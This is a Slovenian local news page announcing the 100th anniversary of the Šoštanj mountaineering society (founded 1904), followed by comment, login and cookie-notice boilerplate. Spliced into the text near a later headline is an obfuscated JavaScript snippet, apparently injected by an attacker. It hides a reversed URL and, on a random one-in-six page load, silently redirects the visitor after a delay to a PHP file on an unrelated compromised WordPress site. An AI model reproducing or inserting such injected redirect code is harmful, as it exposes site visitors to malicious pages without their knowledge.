2004 – 1904 = 100 let Planinskega društva Šoštanj

PLANINSKO DRUŠTVO ŠOŠTANJ
… skupaj od leta 1904 …


V letu 2004 Planinsko društvo Šoštanj praznuje in slavi. V takratnem hotelu Avstrija oz. sedanjem Kajuhovem domu so se 5. marca 1904 zbrali zavedni Šoštanjčani in predstavniki iz drugih krajev. Njihov glavni namen je bil ustanovitev Šaleške podružnice Slovenskega planinskega društva, katere delo po drugi svetovni vojni nadaljuje Planinsko društvo Šoštanj.


V stotih letih delovanja je planinstvo pustilo močan pečat v lokalnem okolju, saj je bilo planinsko društvo velikokrat pobudnik mnogih novih in razvojnih pobud v zahodnem delu Šaleške doline. Pri tem naj omenimo mnoge označene planinske poti, dve planinski koči (Dom na Smrekovcu in Dom na Slemenu), aktivnost na turističnem področju, ureditev skakalnice na Muntiju, uspešne alpinistične odprave, neštetih izletov po Sloveniji in tujini, delo mladih, skrb za varstvo gorske narave, izobraževanja planincev in še bi lahko naštevali.


Sedanja generacija aktivnih članov Planinskega društva Šoštanj s ponosom nadaljuje delo svojih predhodnikov. Ker je stota obletnica pomemben in redek mejnik, smo se šoštanjski planinci nanj dobro pripravili. V letu 2004 poleg standardnih aktivnosti načrtujemo še mnoge druge prireditve, s katerimi bomo na primeren način obeležili 100-letno pot našega društva.


Vabimo Vas, da se pridružite planinskemu slavju, ki bo potekalo skozi vse leto 2004. Tudi če ne zahajate v gorski svet, ste lepo vabljeni v našo sredino, saj je ljubezen do gora hitro nalezljiva in prijetna odvisnost!


Otvoritev praznovanj ob 100. obletnici PD Šoštanj z izdajo svečane številke društvenega časopisa, Planinski popotnik, bo v četrtek, 8. januarja 2004, od 19. ure dalje v Mestni galeriji Šoštanj. Ostale prireditve PD Šoštanj v jubilejnem letu so dostopne na spletnih straneh PD Šoštanj.Predsednik PD Šoštanj:
Bojan Rotovnik

Sostanj.info183 Posts

Volilni
Planinsko$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}pa v 115. leto delovanja />

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki